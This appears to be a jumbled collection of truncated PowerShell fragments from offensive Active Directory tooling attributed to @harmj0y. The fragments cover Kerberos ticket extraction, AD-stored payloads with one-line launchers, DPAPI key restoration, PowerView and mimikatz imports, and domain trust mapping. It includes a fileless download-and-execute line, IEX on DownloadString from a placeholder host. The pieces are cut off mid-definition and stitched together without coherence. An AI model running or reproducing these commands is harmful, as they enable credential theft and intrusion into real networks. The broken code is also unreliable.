function Get-KerberosTicketGrantingTicket
{
    <#
    .SYNOPSIS
    Gets the Kerberos Ticket Granting Tickets from all Logon Sessions
    .DESCRIPTION
    Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associated Kerberos Ticket Granting Tickets.
$GroupData = @{}
$UserData = @{}
$ServerData = @{}
Import-CSV .\DomainGroups.csv | ForEach-Object {
    if($GroupData[$_.GroupName]) {
        $_.GroupName = $GroupData[$_.GroupName]
    }
    else {
        $guid = ([guid]::NewGuid()).Guid
# Import PowerView into memory without touching disk
# IEX (New-Object Net.WebClient).DownloadString('http://HOST/powerview.ps1')
###################################
# Hunting for Users
###################################
# search for administrator groups
#Requires -Version 2
function New-ADPayload {
    <#
    .SYNOPSIS
    Stores PowerShell logic in the mSMQSignCertificates of the specified -TriggerAccount and generates
    a one-line launcher.
    Author: @harmj0y
function Restore-UserDPAPI {
    <#
    .SYNOPSIS
    Restores a user account's DPAPI master key on a new system.
    Author: @harmj0y
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
function Rotate-Byte {
    <#
    .SYNOPSIS
    Performs left/right binary rotation on individual bytes.
    Author: @harmj0y
    .DESCRIPTION
    Implements the logic to perform per-byte binary rotates right and left.
$RSA = New-RSAKeyPair
# local tests
$ComputerName = 'localhost'
$StorePath = 'C:\Temp\temp.bin'
Write-Host "`n[$ComputerName] AES Storepath : $StorePath"
".\secret.txt" | Write-EncryptedStore -StorePath $StorePath -Key 'Password123!'
Read-EncryptedStore -StorePath $StorePath -Key 'Password123!' -List
Get-EncryptedStoreData -StorePath $StorePath | Remove-EncryptedStore
# import PowerView and Invoke-Mimikatz
Import-Module .\powerview.ps1
Import-Module .\mimikatz.ps1
# map all reachable domain trusts
Invoke-MapDomainTrust
# enumerate groups with 'foreign' users, and convert the foreign principal SIDs to names
Find-ForeignGroup -Domain external.local
Find-ForeignGroup -Domain external.local | Select-Object -ExpandProperty UserName | Convert-SidToName
function ConvertTo-Rc4ByteStream {
    <#
    .SYNOPSIS
    Converts an input byte array to an RC4 cipher stream using the specified key.
    Author: @harmj0y
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None